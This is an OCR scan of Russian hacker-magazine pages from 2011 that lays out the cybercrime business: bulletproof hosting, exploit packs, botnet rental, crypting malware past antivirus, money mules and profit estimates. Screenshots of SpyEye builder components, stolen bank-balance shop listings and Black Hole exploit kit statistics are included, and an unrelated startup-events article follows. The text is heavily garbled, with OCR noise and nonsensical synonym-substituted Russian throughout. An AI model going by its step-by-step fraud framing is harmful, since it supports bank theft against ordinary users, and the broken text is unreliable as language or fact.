0(-.;кряоr;н"f"Т\t ?

0361"1yacaei!Spy fyt.8Jit(t....,ttит0Uttt6кa}
(окi"ОО е о.нбкоN"" s eкp.п~tn.)

036/"lya:eell Spyf yePtlth..t Jie
0

0 .Лept)611Jac•eнSpyEye .tJit

PASSNIТclиe.COII

l t "GPICPIIK8ZerQf1tg

infect
01WI

вместе с

exploot.in? бе} o::onnenop e

симпатия fМ"IUO ..е стоит.

Sltht
http :l/vuk\es .c:om/~<id .phpJ"t-861 • fJТ 0::01У>К10Р Н

-

MO::Ofepw8

IМIAJIIOI

-·-

--

-

Pantifick
i 0tJ0::0Мfi(ТOP80Нtltl"lerOit8CТOI1Т ,

0 Аа 01 ero tPOll.t бы 01 ..е nродаю)) Ko.nnetCТOp, к..:"" у:«е скаs""" нiiЙТIIItf nРОбnем.

---

--

-------

0aefon
0 М0AJtl01

-----------

Allll SpyEye .

--

----- - --- -

- -

---------

Сnнсоо::ою.ау11еА :
cc:gr.ьtlff

""""

ftpNd!COtW!ect
usbspreьd
cnditgr..Ьbet"

b~~ngMmme

l bugreport

j 01afon
hlt

ОАНМ 0j) Хке

SpyEyt:

· SpyEye v1.0 .1 · (8uildet",o.t.Ь..Нe, ,onncyaЬ .t,ссеи
-Spyfyev1.0 .9 -(&ui1681"",WtbPanti, Colltctor .. .)

Р-1 ... )

· SpyEytv1.1.Э9[Crtcktdby AEO) · (Cr..:ked&uilder)

· Spyfye v 0.2.SO [Credted Ьу Zt~ ) · (&uilder + P.tch)
·Spyf yev 0.2.60[CredrtdbyAED) · (euilder + Patc:h)

081.

Новый паспорт, правда единаче от бесплатной доставкой?! В мнететакогодобра предостаточно

ХАКЕР

00 / 053/2011

Баблона малвари

Чтобы у него самого неграмотный было проблем от законом, серверы
размещаются во странах от теп л ым, приятным климатом,

большим числом диких обезьян равным образом законами, которые
неприветствуютвторжениеиностранныхспе ц службна

сувереннуютерри т орию страны да плохо что касается п исы во ают, ч т что касается а
т акое кибепреступность , похищение денежек равным образом п рочих п рият н ых
вещей при помощи интернет. Стоит ли говорить, почто урядник таких
стран, равно как правило, н е особняком говорит по-английски да безвыгодный осо­

потому что в соответствии с л ьзуе тся электронной почтой.

Пуленепробиваемый lабузоустойчивыйl хостинг - са ­
мая дорогая безделушка во типичном криминальном мероприятии.

В сре д нем возлюбленный обойдется на 000 американских долларов на ме­
сяц . Можно дороже, дозволительно меньше . В целом бери благополучный
Тlowo :

..,... ,, . .. ... ....:

07<1:""

...." . ........

lCi~(l99t,Z..,oro)

приобретение информации, дебордированный изумительный времени, надозаклады­
ва тьн есколькотысяч д олларов.

Далее на случае массовой атаки la они больше распростра­
нены во целях наживы да около нежелании потомдолго работать

Ехр-штука порядочно известн ая да доволь н ол е гкодо ст упная

з тюрьме! берется какой- н ибуд ь свеже н ький эксплоит-пак

!он а «к раймвар-пак >> J , кой ставится для нынешний самый хо­
месте жительства, номерах страховок равным образом прочее. Ты никак не по­

стинг. Можнодаже приёмом дать взятку постоянно готовое, предустанов­

вери ш ь, только огромное числотупых юзеров сканируют п аспор т,

ленное. Н ет т олько п ейлоа д а, так очищать имущество вари, не без; помо щ ью

кредитки, пенеионное страхование, ИН Н равным образом накипь документы

ко т орой да утекут данные. Эксплоит-паки , кстати, дозволено

да оставляютэти сканы держи винте. А следом реальные преступ­

достатьдаже даром . Но кабы твоя милость хочешь, в надежде на них

ники, получив сканы, выкачанныетем а Zeus"oм, ра д остно

были свежие уязвимости, а сие хватит многократно залогуспеха,

делаюте сего хозяйства клоны, естественно же, из фоткой ордер ­

топридетсяза п латить.Около1300-1500баксов.

чика. Для ряда стран их можнодаже зарегить на базе полиции!

В киберпреступники абсолютно дебилов невыгодный берут, этак зачем

Так сколько останавливаться гражданином Америки !ну не в таком случае — не то п относительно крайней мере

очевидно, аюшки? умышлятель понимает, что такое? получи и распишись компе

уяснить туд а для П МЖ I мож н относительно после какие-то 0 000долла р ов.

жертвы целесообразно какой- н ибудь антивирус. П оэтому, разра­

При этом понятно, как бы выигрышно всегда зто во рамках масштаб­

батывая малварь равным образом криптуя еще имеющуюся , каверзный

утнапиштим операции: какой-то Вася перед именем Джана Смита въез ­

гаденыш полагается прогнать конец путем противовирусный

жает на стра н у, уво д да т миллио н баксов со вз л оманно г по отношению не без; ч е т а,

мультиска н ер. Н ай т равным образом такое имущество на равно н тернете на различных

получи и распишись кой сии копейка перевели от другого счета, равно флегматически

реализациях неграмотный составляет труда : сие может бытовать облачное

уезжаетдомой . Полицияприезжаеткнивчемне п овинному

решение, может бытьлокальный вместе с офт, не грех быть в расчете ради

ло ш куСмиту, п мастак п об р т ко т оро гоукрали равно аккау н т ко в таком случае р по части го

сие д ене г, а мож н в рассуждении обратиться еще накануне укра д ен­

был взломан, равным образом начинаетставить его во ужас неудобное поло­

ным !Напомним, который т через но вирустотал - рес у рс , материал

жение . При этом обнаружить и концы в воду Васи без малого н ереально .

скоторогоутекаютвантивирусныекомпании,поэтому

В общем, какты еще п онял, на сеуд об н в отношении да п насчёт ролям. Е сли твоя милость
никак не годяй равно тебе чешется повидать судьбу, твоя милость може ш ь выбрат ь
сызнова да профессию мула, равным образом самовластно оторвать ворованных карточек,

приватную малвар ь н а нем никак не т йес т ят. - П рим. ре д . l . Е не без; л да
хочетсягарантий,тообычно п латятоколо500баксов .
Чтобы писать или — или закриптовать уникальную мал­

ипойтисниматьнали ч куиликупитьнаних 0 00айфонови

варь, придется выложить сызнова баксов

000. Зато, во вкусе зто н равным образом

не разрешить их себя домой. Б ез муло в, собст на е н но, никуда, на книжка

п ечально для того производителей антивирусов, ни единолично изо

случае коли п реступник хочет п олучить реальные д еньги.

них ее, правильнее всего, невыгодный поймает на направление что самое меньшее

а
Хочешьпод е точить не без; моя персона
н ай д е нн ы м э кс­
пл ои так м ? Этолишь
нераздельно равным образом з вариантов ,
идеже можнооставить

равно нформацию

Длятого с намерением тебе следственно п относительно н ятно, наравне до этого времени э т равным образом винтики
образую т отлично ажен н ый мягкое золото н изм, д авай рассмотр равно м п уть для

легкимденьгам через основания до самого конца, так, какесли бы один
правонарушитель решил непри н ужде н нообогатиться, вос­

по мнению л ьзовав ш исьсвободойиб ла гамиинтер н ета.

HOWTO NOTTO 00
Сразу об говоримся, что-то на се рас п исано прибл изите л ь н о, не без; в рассуждении п ре ­

деленными допущениями да во рамкахузкого сценария. Знатоки

состояние la нас мамой клянусь полистываютитакиеl могут заключить пари да
обнаружить кучу н еточ н остей, так повторюсь: гл ав ны й см ы сл-дать
сообразно н ять, равно как вседовольнолегко равно прибыльно.
Д ляначалакиберпреступникивыбираютжертв~или

что до д ну, иначе говоря ахти м н ого. От сие го зависит, какони собираются
загребать золото лопатой : быстрозаодинразилипос т е п еннозасчет
большого числа юзеров. Как следствие, меняется равным образом молодчик атаки:
таргетированная тож ковровое бомбометание. В со л учаетар ­
гетирова нн ой атаки уведомление собирается, на правах п равило, из
социальных сетей, возле массовом подходе сие отнюдь не так важно.
Дальше н адо урегулировать технические моме н ты, ведь нашел т ь в качестве кого

буд ет добыта информа ц ия с незадач л иво г в рассуждении юзера. Д ля н а­
чала берется приближенно называемый п уленепробиваемый хостинг.
Винтернетенатема т ическихфорумахпредложенийхоть
насчёт т бавляй. Дл мы согласно н има ни я: хаетеру до сей времени равно, зачем ваша сестра после этого х р а­
н ите для серверах, около этом возлюбленный никак не будетсдавать вам полиции.

ХАКЕР

00/153/2011

085

MALWARE
Мулов ищут во часть банке, аккаунты которого чистят.
Или могут поканючить показать аккаунт. При этом мул п о­

МАЛВАРЬНАПИСАНА,ХОСТИНГ

лучает

00-15% ото снимаемой

деньги . Что дьявол делает потом?

Отправляет бабки всякий платежной сис темой подобно

ЕСТЬ, ОСТАЕТСЯ ВОПРОС

Westeгп Unioп Саше Кузнецову ! сие , в качестве кого ни странно, самые
рас п ространенные наименование да подпись про России] с своей

РАСПРОСТРАНЕНИЯ

перепрелый Америки во какую-нибудь раэвивающуюся страну
вроде России. Искать в дальнейшем Сашу-занятие бесполезное,

безграмотный говоря ранее в рассуждении том, зачем Саша может купитьлевый серпастый во
п ары дней, а сего достаточно, ради удалить из жертв

переходе равным образом выудить до этого времени получай него.

Что свой н езаконопослушный Са удар имеет нате выходе? Все

совершенно самое интересное.

зависитотегожадности. Если у тебя важно вместе с арифметикой,

Итак, малварь написана , хостинг, несравнимо планируется

собиратьданные в рассуждении кредитках равно банковских счетах, есть,

твоя милость сейчас посчитал , сколько начальные вложения обойдутся самое меньшее

остаетсявопросраспространения . Нетпроблем!Арендуем

во 0000 -7000долларов. Допустим, ботнетокучил

ботнет. Цены эависятотто г о, известный ли некто поуже производи­

пусть бы на реальности их, конечно, хорош сильнее . Те но американ­

телям антивирусных решений alias нет, какие твоя милость получишь

цы даже поле утысяч зеленых получай карточке, правда имеют. Умножаем

надо ним права, в какой мере машин гарантиров ано во онлайне равным образом

юзеров нате деньги, отнимаем

проч ее. Ориентировка пользу кого начала- только

инда

000 баксов,

однако

0000 юзе ров,

00-15 % бери мулов, половая принадлежность учаем п усть
000 ОООдолларов чи стога ном . Покрывает7000 ? Мн е

кажется, вполне. При этом, повторимся, безвыгодный нужно забывать,

это, конечно, самое меньшее .

почто киберпреступнику, тот или иной решил всегда сие провернуть, н е

Е сли киберпреступник дополнительно умный, так позже п окупки
ботнета спирт его модифицирует- криптует соглашение переда­

желательно являться ни кодером, ни админом, общо никак не нужно иметь отличительной особенностью

чи данных , меняет кое-что еще. Таким образом спирт обезопасит

какими-то реальны ми техническими зна ниями .

себя ото ко идалова со стороны продавца ботнета. Это хорошенького понемножку

МАСШТАБ ТРАГЕДИИ

это станет сызнова до некоторой степени сотен баксов у сейчас прикормленных

программистов . Ботнетувяэываетсясэксплоит-паком ,

Как результат- безграмотный удивительно, вследствие чего СМИ сообразно всему миру,

равно понеслась : причина начинают растягиваться держи неблаговидный

а во Америке во частности , весть постоянно рапортуюта числа ­

сервер. Возникаетсамый важнейший вопрос: какобналичить

миллионныхубыткахсосторонычастныхпользователей

деньги? Очевидно, в чем дело? п еревод получи и распишись взломанные счета ни ложки

равно компаний. Одна всего лишь старушка Объединенное Королевство Великобритании и Северной Ирландии отрапортовала ,

отнюдь не дает : сие совершенно ясно как божий день прослеживается. П оэтому пре­

что-нибудь урон ото киберпреступности во ст ране оценивается во

ступники предпочитают скидывать д е ньги посредством мулов. Их не без;

млрд фунтов во год. Почем утак прои сходи т ? Про буют многие,

07

самого начатки разбойного плана начи н ают сыскивать в соответствии с да нету,

а ловят отнюдь не по сию пору х. Законы большинства стра н держи хо дят ся во

на правах правило, п од видом рекламки: <<Хочешь

таком помогите тоянии , в чем дело? в области ним осуди ть пр нашел т у пник а не возбраняется или — или

0000 баксов

на час? Тыкай во баннер!>>. Наверняка твоя милость видел кучутаких

услов н о, либо лишь получи пару лет. При этом никт что до далеко не требует

баннеров на интернете , вдобавок почасту в в корне себя

вернутьвсехукраденныхдене~потомучтониктонезнае~

респектабельныхсайтах.

как много их весь было украдено . Морально равным образом этически

Кто-то с денежных осликов в соответствии с нима ет, аюшки? делает, кто­

совер насаживать пуговицы вина на интернете проще: твоя милость н е вот

жерт во у во лицо, присутствие этом многие хакеры любятиграть занятие

то- нет. Ведь буде преступники подходят ко делу не без; умом,

они составляюттрудовой условность , в соответствии с которому труженик

Рабин Гудов- наказывать, скажем, богатых америкосов получай

простодолжен сниматьденьги на банках. Когда далее мула

скопидомничество да принципи ально, например, неграмотный атаковатьжителей

ловят-а ловят их около всегда, -те могутуйти на несознанку

родственный страны !Хм ... а пишущий эти строки слы шал , что такое? сие попозже у, ась? во родственный

равным образом говорить: << Ну позвольте, моя особа но работалl Я равным образом безграмотный знал, в чем дело? сие

стране из-за сие порой отрезают щипанцы . -При м. ред.].

н езаконно! Вот у меня договор! Что вас говорите? Д еньги во­

Не пей — не хочу равно всесветный киберполиции-если во согласно сле период е

ровали?! Вотсволочи! Я соглашаться помочь вам, ребята! Я не без; вами!

годы возлюбленная хо ть так стала появлять ся, так надо взаимодей­

Накажем злодеев, только лишь чисто автор этих строк насчёт них сносно малограмотный з наю, целое

ствием подразделений сообразно всему миру междусобой сызнова ра ­

связь было в соответствии с электро нн ой почте >>. Такая обстановка куда

ботать равным образом работать. При этом дробь вопросов никак не полноте решена

а

типична , например, во Л атинской Аме рике. Там заключая людей

ни ко гда с - вслед общеполитических препятствий : вроде несомненно

Любой копилка держи подбор

положено затем первого раза прощать: ну-кась безвыгодный хотел особа

изо хоро шего фильма << По сле прочтения сжечь>>, у США в отлучке

плохого, злой гений батюшка утал . Что же, мгновенно во тюрьму сажать?!

экстрадиции вместе с Венесуэлой.::J:

равным образом по сию пору во количестве

00$ For 000$ Balance

Bank of America.

0

~
~-

,1

•SJ)$tF.~r~soo.$~al_!ln.c~
Warrtanty : 0 Clay
Мах buy:3

Min buy: 0
ln Stock : 03
Buy With 0alance

000$ 0000$ 0500$ 0000$

Balance

086

0000$

00$ For 000$ Balance

00$ For 000$ Balance

cffibank

НSВС Ф

I L50.$tF.o.r (.S90.$LBa~n.c~

•SO,$tF.or•S.OO.$lBalitn.c.e

Mln buy: 0
ln Stock : 02

Warrtanty: 0 Clay
Мах buy : 00

Buy With 0alance
000$ 0000$ 0500$ 0000$ 0000$

Balance

00$ For 000$ Balance

!

Minbuy : 0
ln stock : 02

Warrtanty : 0 Clay
Мах buy : 00

Buy With 0alance
0005 0ooos 0500$ 0000$ 0000$

Balance

Min buy : 0
ln Stock : 02

Warrtanty: 0 Clay
Мах buy: 00

Вuу With

000$ 0ooos 0500$ 0000$

0alance
0000$

Balance

ХАКЕР

00/153/2 011

Сплоит-пак

Сплоит-паки служат интересах массового
заражения посетитетей сайтов
· чрез уязвимости на браузерах. Набор
эксплоитов

ЧТО ЭТО ТАКОЕ?

Black Hole ото русского парня

Раuпсhпоявилсячутьбольшегоданазад
равным образом ранее успел натворить бессчетно шума .

0

СТАН1l111Кд

0(ackho(e 0"

L;]

начало:

ФАЙЛЫ

IIOT OKI1

L.1

Конец:

Ы ЗО nАСНОСТЬ

l·iiii!ФI!."i

СfАТИСТИ КА

ЗАГРУЗКИ

"Мit

JAVA SКYUNE >

05511

05.08 -

Jav~oeE >

02019

090758 хосты -

03979 ЗАГРУЗКИ

07.18

PDF LIВ"ПFF >

0452

04.59 -

Jav~ ТRUSТ >

0112

03.82

01837 хосты

0.22%

PDFALL >

0449

0.54

ПРОБИВ

Jav~SМВ >

0677

0979 ЗАГРУЗКИ

-

0.79

ПРОБИВ

0РАУЗЕРЫ !

ос

WindowsXP
Wr1dowsVIS121

ЗАГРУ3КМt"М>

051858

06442

052984

04"1606

04254

Wondows7

015214

094900

03188

WIПdows 0003

039

068

022

00.83
0.86
0.47 .

ЗОб

092

05

WIПdows 08

061

056

0

0. 03 .

01

09

об

0.00

02

l\Unux

03

потоки

defaut ,
019 >

по отношению

02

ХИТЫ t

ЗАГРУЗКИ

051452

012616

02753

Сплоит-пак ведетподробную статис тику работы: учитываются шаболда посе щаемость , наличность заражений,
результативность отдельных эксплоитов
равным образом ст.руктуратрафика.
Все блоки сданными представляют со -

01268

D
касательно

дозволяется подключать/отключать, а

Chrome >

00921

08253

09

"""

-

"

0.39
04.32

Выбор нагрузокосновывается нате таких

критериях, по образу ОС, издание браузера ,
держава происхождения, реферер вебсайта да инда минута захода .
В медаль через конк урентов

Black Hole

имеетсистему лицензий . Вотан годочек да с-

"""

Firefox >

03138

08928

0432

MSIE >

052947

021683

09450

Мozila

09

03

0

03450

01989

013

0.62

0027

031

08

01.79

"""

)

0.56

ХИТ Ы

ХОСТЫ t

ЗАГРУЗКИ

098355

077091

06819

0.07

~

tnted IOngdom

026398

019465

0597

0.36

0!1

can~

04149

08333

0020

0.89

:с Spain

00086

09626

0791

02.80 .

01!1111 AustrМa

06593

04886

0278

0.14

0 0 Irotand

04427

03962

0109

05. 01

а switzorland

03385

02668

0096

0.65 .

:

01778

01519

0916

06.63 -

==~

00616

0608

097

00.38

:!;;

Norw~y

0679

0067

091

01.19 .

Egypt

0989

0900

044

09.27 -

0084

0626

098

02.93

-е Finlond

New Ze~land

""

08.60

СТРАН Ы

=

-

t:"

01.86 .

!i§ tJnl<!d 0121\<!s

NetherWxis

-

0.35 .

fJ

0.14 .

пользования стоит$1500, а право
нате полгода равным образом ко на артал-$1000 и$ 000.

битва настраиваемые виджеты , которые

ЗАГРУЗКИ

S..~ >

по отношению . оо -

хосты

08708

хосты

0.00

что до

00114

ХИТ Ы

О Oper~ >

05.89 -

Windows 0000

SJI!WindowsМE

D

хост ы

062018

!1.

~ WIПdows 0"П

D

ХИТЫ

fJ
011
011

,,

[i]

neve r

0.44о/о

ЗА СЕГОДНЯ

01989 ХИТЫ r-

§;>!<!.~

эксплоиты

ЗА ВЕСЬ ПЕРИОД

031652 хиты С

Автообновпение:

НАСТ РОЙКИ

0215

0941

035

01.04

0734

0715

023

01.90

0411

0278

008

0699

0025

0054

вдобавок сменять их месторасположение.

El
во

Black Hole во основном использует

D

распространенные равным образом принародно доступныесплоиты. При этом онидают
вн у шительный доля проб ива.
Важной функцией являетс автор этих строк из -

щренный вместе с крипт интересах направления

трафика ITDSI, который-нибудь используется
к направления польз ователей для

[J

В мае BlackHole Exploit Kit версии 0.0.2
ут ек на паблик,линкдля ее загрузки
опубликовал выгода thehackeгпews .
com. Это произошлочерез 0 недели
посл е публикации сорцов ZeuS.
За исчерпывание сплоитпака по мнению
н азначению дозволяется почерпнуть по 0 парение
необеспеченность свободы, соглас так статье
073УКРФ.

Е§:! Вrozil

Qatar

Друrое

0.13

03.13

мч;;;чщ;р

опре д еленным нагрузкам .

ХАКЕР

00 / 053/20 01

087

СЦЕНА

088

ХАКЕР

00/153/2011

Стартапы, деньжонки равно счастье

Мариша «Mifrill» Нефедова lmifrilltagameland.rul

О РОССИЙСКОЙ
СТАРТАП-СЦЕНЕ

Ни на одной непохожий сфере, по­
жалуй, в отлучке столько возможно­

стей на старта, по образу на области
информационных технологий .
Здесь речьдаже невыгодный об возмож­

ности произвести феноменальную

апримерамиуспехадалекоходитьне

единомышленников, которые готовы от головой

нужно:

покупаться на расчёт равным образом далеко не останавливаться, все еще невыгодный

Facebook равно Маркуша Цукерберг,
Amazon равно Джефф Безос, Twitteг равно Джек

появится на первых порах прототип, а в дальнейшем ходящий

Дорсиа. Все сии компании когда-то начинали еле-еле

бизнес? Как иссякнуть получи и распишись консульта нтов-менторов ,

ли безвыгодный во гараже, не без; кодом, написанном совершенно

которые помогутсделатьтебе нечто, никак не всего-навсего

<<на коленке». Теперь но они превратились во

интересное, только уже равно способное добиваться

огромные бизнесы не без; умопомрачительной капи­

аудиторию равным образом пробуждать доход? Чем при­

тализацией.

влечьтех людей, которые готовы помочь тебе от

Сегодня, рано или поздно новые сервисы появляются, в качестве кого

финансированием, с тем проектом занимались

карьеру, работая во известных

лешье мясо послетермоядерного дождя, дисфемизм <<стар ­

компаниях. Нет! Это та сфера,

таn», особенно во российской действительности,

общество с профессионалов, которые действи­

себя здорово дискредитировало. И действительно,

тельно способны совершить гегемонящий продукт?

идеже компанию можешь сформировать

в некоторых случаях твоя милость видишь, в чем дело?

00 проектов с 000 нисколько

Верный конец для поиску ответов нате сии вопро сы­

твоя милость сам. Довести простую идею

изо себя неграмотный представляют, твоя милость можешь подумать,

предполагать причастность на различных стартаперских

сколько всё-таки сии начинания- полная опошление . Но

мероприятиях. Мы подготовили про тебя емкий,

сие обманчиво. На Западе начинающих предпри­

да обстоятельный поле зрения те х, которые нужно

нимателей хвалят да следовать совер шённые ошибки,

сделать визит на первую черед .Но хоть тусовка­

чай пусть даже ошибка-это опыт. В этой статье да мы не без; тобой безграмотный

сие до сейте поры далеко не главное. Важно, ась? без людей,

будем бубнить тебе атом, чтотакое стартап равно

которые хотятзапускать проекты, поглощать люди,

накануне работающего прототипа,
макет накануне коммерческого

продукта, а продукция впредь до рабо­
тающего бизнеса. И нынешний траектория
допускается прошагать лишь вслед не­

почем месяцев!

ХАКЕР

00/153/2011

малограмотный банан со половиной человека , а полноц енная

какдобитьсяуспеха.Едвалиэтоунасполучилось

готовые во сие вкладываться. В России безотлагательно

бы лучше, чем, для примеру, во книге <<Старта т> Гая

деятельно работают в духе частные инвесторы, где-то

Кавасаки, одного изо первых работниковАррlе да

да венчурные фонды, которые неграмотный легко желают,

известноговенчурногоинвестора Силиконовой

а буквальножаждут выкопать толковые команды,

долины. Но автор хотим помочь тебе верно сде­

которые не без; горящими глазами хотят олицетворить во

латьтусамуюпопыткусоздатьпроекъкоторый

житьё идею, которая во самом деле может пре­

попадет на мерило <<один изо десяти ». Как откопать

вратиться во благополучный проект.

089

~ЦЕНА

МЕРОПРИЯТИЯ ДЛЯ СТАРТАПЕРОВ
Startup Weekend

SumiT

Startup Point

Организатор: «Главстарп>

Организатор: Клуб иннаваторов

Организатор : Staгtup

Сайт: гussia.staгtupweekend.oгg
Где: no всему миру, во фолиант числе на разных городах России
Когда: шаровидный время

Сайт: sumit.гu
Где: Санкт-Петерб у рг

Сайт: staгtuppo i nt.гu
Где: различные города Ро ссии

,~J /

Wee~~~--

Startu

Когда : сезон

Когда : непроходимый годочек

Staгtup Weekeпd, за­

родившийся на Сиэтле,
житейское море общемировая.

Point

suм==·

Каждый таковский << Уик-

..

энд», -это трехдневная

Клуб инноваторов-это
побольше

0500 человек,
050 проектов, 000 экс­
пертов , 020 часов живых
встреч. SumiT делится

Встречи Staгtup Point
~

~аrtuр Point

nроводятсяодноимен-

ным крупнейшим
стартап-сообществом
рунета,которое

рабочая сессия, получи и распишись которую собираются команды

нате три этапа. В ходе нулевого, предварительного

начитываетболе е 00 ОООучастников , 0500+

интернет-проектов, специалисты, эксперты изо

этапа собираются идеи равным образом формируются предва­

проектов, 000+ частных инвесторов равным образом венчурных

области IT равным образом инвесторы. Здесь позволено в духе нажить

рительные составы команд. Затем cлeдyeтSumiT

фондов. Staгtup Pointyжe привлекли больше $3 млн

совет, где-то равно улыбнуться начальные инвестиции. Уик­

Weekeпd, представляющий своего рода обучаю­

инвестиций во неодинаковые nроекты. Поинты -это

энды проходяте вечера пятницы прежде вечера вос­

щую вводную передследующим этапом-Stагtuр

мероприятиянесоревновательные.Этоскорее

кресенья . Это спрессованный равным образом оченьактивный

Магаthоп. Марафон длится месяц, да на ходе него

дискуссионная орхестра чтобы активистов, же­

лающих начатьсобственный коммерция , экспертов да

формат, некоторый даетотличный наркотик от извлечь

команды работают надо проектами на комфортных

акцелерация , необходимоедля воплощения мечта­

условиях. Проходят мастер-классы ведущих

инвесторов. Здесь позволено узнать вместе с новыми

ний во реальность. Например, по мнению результатам 02-го

специалистов за разработке , менеджменту равно

людьми, сыскать партнера , столкнуться из инвесто­

<< Уик-энда >>, товарищество << Главстарт >> равным образом довольно пространный

продвиж~нию IТ-проектов, консультации по мнению по всем статьям

конопля равным образом экспертами индустрии. Поинты состоят изо

Морейнис, первый стартап-инвестор России,

возникающим вопросам через команды SumiТ. В за­

презентаций стартапов во формате <<Eievatoг Pitch>>

дадуткомандамлучшихпроектовдо$100000на

вершение проходит lпvest Fest, в котором коман­

02-минутная презентация преддверие инвестором! да

проект. Также <<Главстарт» является венчурным

ды представляютпроекты. В этом году получи и распишись lпvest

докладов успешных предпринимате лей Success

партнером РВК !готов соинвестироватьдо 05%

Fest были приглашены инеест-фонды равным образом ведущие
!Т-компании: Ruпa Capital, Almaz, ABRT, ВТБ, Mail.

Stoгy. Проекты получаютфидбек с аудитории равным образом

через общего объема требуемы х инвестиций! . <<Уик­
энды» проходят на разных городах России.

гu Gгoup, ЕМС, lпtel, РВК, RSVVentuгe Paгtneгs.

проекты для того вложения средств.

экспертов. Инвесторы , на свою очередь, находят

ИНВЕСТИЦИОННЫЕ ФОНДЫ
Almaz Capital Partners

Runa Capital

Яндекс.Фабрика

Сайт: almazcapital com
Тип фонда: венчурный
Дельта инвестиций: -$100-500

Сайт: runacap.com/ru
Тип фонда: венчурных инвестиций nо посев н ой равно ранней стадии

Сайт: company.yandex . гulpubliclstaгtlfactoгy.xml
Тип фонда: во е нч у рныхинвес тиц ий nосевной да ранней стадии
Дельта инвестиций: $50-100 твоя милость с.

( . AlmazCapital
R41eHtino;tltut..."CISitlnoQIIon
,,..,.~Potemltl

Дельта инвестиций: от$500до нескольких млн

Almaz Capital Рагtпегs­

Фондсоздан на августе

российскийвенчурный

001 О г. основателем

фонд, на 0008 г. осно­
ванный Александром

Галицким !учредитель да

~

Runa

"~ Capital

Paгallels да Асгопis

Сергеем Белоусовым

Я ндекс
-{!~

равным образом основателем фонда

Яндекс .Фабрика, за­
нимаетсяинвестирова­

ни ем как бы на зарубежные,
круглым счетом равно на российские
стартапь~связанные

от интернет-бизнесом, мультимедиа, навигацией

цийдlmаz Capital Paгtneгs да инкубатора Runa Рагk,

Almaz Capital Paгtneгs Александром Галицким.
Runa Capital инвестирует на хай-тек-стартапы

на контингент которого входитФонд посевныхинвести­

ранней стадии развития. Управляющий член товарищества

проекты Иван деке пьяный во поток возраст накопить

ций Runa Capital; не без; 0010 лета елда Совета фонда

фонда-Дмитрий Чихачев. Интересы Ruпa Capital

несколькомиллионовдолларов присреднем

<<Сколково>>; президентконференции Russian

направлены, предварительно всего, для программное обе­

объеме финансирования держи стартап во $50-150тыс.

TechTouг20041. В 0008 г. широта фонда составлял

спечение, мобильные приложения равным образом интернет­

Компанию интересуют, на частности, новые модели

$125 м л н, изо которых $60 млн вложили Cisco да UFG
Asset Managemeпt . С тех пор бумага инвестировал

сервисы. В сумма партнеров фонда Runa Capital

бизнеса на интернете, мультимедийныетехноло­

входятболее20технологическихпредпринимате­

гии !распознавание лиц, штрихкодовl, мореходство

на компаниидрроllо Pгoject, Paгallels равно другие.

лей да профессиональных инвесторов . Деятель­

равно социальные коммуникации, оценка равно структу­

Офисы Almaz Capital Paгtneгs работают во Москве равно

ность фонда поддерживает бизнес-инкубатор,

рирование информационных потоков, методики

Силиконовой долине. << Алмаз>> инвестирует во насыпь о-

план которого выхаживание конкурентоспособ­

изучения поведения пользователей на интернете,

дыеинновационныетехнологическиекомпании

ны х технологических компаний изо nерспективных

рекламные те хно логии , интерфейсные решения ,

во медийных да телекоммуникационных отраслях

российских стартапов. Инкубатор получил на­

атакжеобработкаипредставлениеразличных

бизнеса натерритори да России равным образом СНГ. В 0010-м объём

имя Runapaгk . Весной сего возраст Runa Capital

данны х. УЯндекса поглощать открытый участие для

инвестировал во комnанию Qik !мобильное видео!,

вложил $1 млн во замысел <<Метабар>> !инструмент

технологиям, которые емутяжело отработать

проданную5kурев2011 мза$150млн.

чтобы быстрого создания тулбаровдля браузеровl.

среди компании.

директор сожитель фонда венчурных инвести­

090

равно другими технологиями. На перспективные

ХАКЕР

00/153/2011

Стартаnы, денежки равно успе х

Во по всем статьям мире круг проведения мероприятий с целью стартаперов­

во разбитое да представпять собственный цель возьми вывод публики равным образом инвесторов. Для

норма, тем не менее у нас относительно таких поинтах, похоже, недостаточно кто такой знает. А опять-таки на

альфа и омега не запрещается побыть получай мероприятиях на качестве зрителя,

России они равно как существуют. Тутсовсем никак не хоть умри приёмом прекращаться

пообщаться, внять доклады, осмотреть возьми преэентации.

Harvest

StartUp Week

Организатор : школа веб-разработок Михаила Кечинова

Кто проводит: GгeenfieldPгoject

Сайт: hackday.гu
Где : ра з ные города России
Когда: выпуклый годок

Са йт: gг ее nfiel d- р го ject. г u/harves t

Kтoпpoвoдит:STARTeuгope,lnitial Factoг. «ТехКранч Европа»
Сайт: sta гtupweek20JJ . com

Где: небо и земля города России

Где: Вена, альпийская республика

HackDay

. . HackDay
""-"""""-м""""

Когда: целый годок

Когда : со 0 no 0 октября

Серия мероприятий

По форматустартап­

HackDay интересна

первенство

своимформатом.Девиз

Harvest бог

похож получи и распишись стремитель­

«От идеи предварительно первообраз а
за2дня»rово~и т самза

ный

Ha ckDay. Этотоже

0011

г.

В окончание хоте рогач

.I{J?TARТUP
~ g.~ ~....-r..oteat~va~
WEEK

пр ограммасоздания

бы ВКЛЮЧИТЬ И ОДНО
нероссийскоемеро­

приятие, сие StartUp
Week Europe Fеstivаl­

себя. Форматфестиваля НасkDаубыл разработан

инновационных бизнес-проектов не без; нуля . За двум

коммуникационнаяплоща дкадлястартапов

колтун паня ей

дня участники прогр аммы выбирают как никогда

Центра льной равно Восточной Европы . Конечно, неграмотный в

творческих идей сотрудников равным образом пр едстав л ения

интересные идеи, формируют проектные команды

каждое шаг для того стартапав поедешь вслед

прототипов топ-менеджменту. Мероприятия вы­

равным образом рядом поддержке экспертов работают по-над их реа­

границу, так Вена н е в такой мере стрела-змея далеко, равным образом лететьтуда

глядятнемного пр още пр едыду суп х. Здесьчаще

лизацией. На

ничуть неграмотный этак накладно, как, например, на Штаты .

Ya hoo! покамест во 0005 г. на реализации

Harvest позволено приспеть не без; собстве нной

всегонетименитыхспикеровикрупныхинвесто­

идеей, которуюужедавно желательно реализовать.

А мера воочью заслуживает внимания. Так,

ров, нетбитвы невыгодный для жизнь, а сверху последний вздох от соперни­

А дозволительно обнаружить команду единомышленников,

спикерами получи StartUp Week выступятоколо

ками. Зато в этом месте кушать способ извлечь попытка

поработатьсэкспертамиинаконецсдвинуть

европейскихэкспертовинтернет-индустри~

и, возможно, снарядить команду иначе оказаться пригодным на

родной ради ек т вместе с мертвой точки. Организоторы­

серийных предпринимателей да инвесторов. Среди

какой-то проект. Во всяком случае, организаторы

GreenfieldProject -это стартовая мостик с целью

них: ЭстерДайсон, директор правп ения

НасkDаупозиционируютсвоифестивалиименно

высокотехнологичных стартап-проектов, обще­

так. Кстати,

Ha ckDay проводятся нате самые возьми раз­
ные тематики, сие малограмотный всего лишь IT, да равно кино, вербункош ,

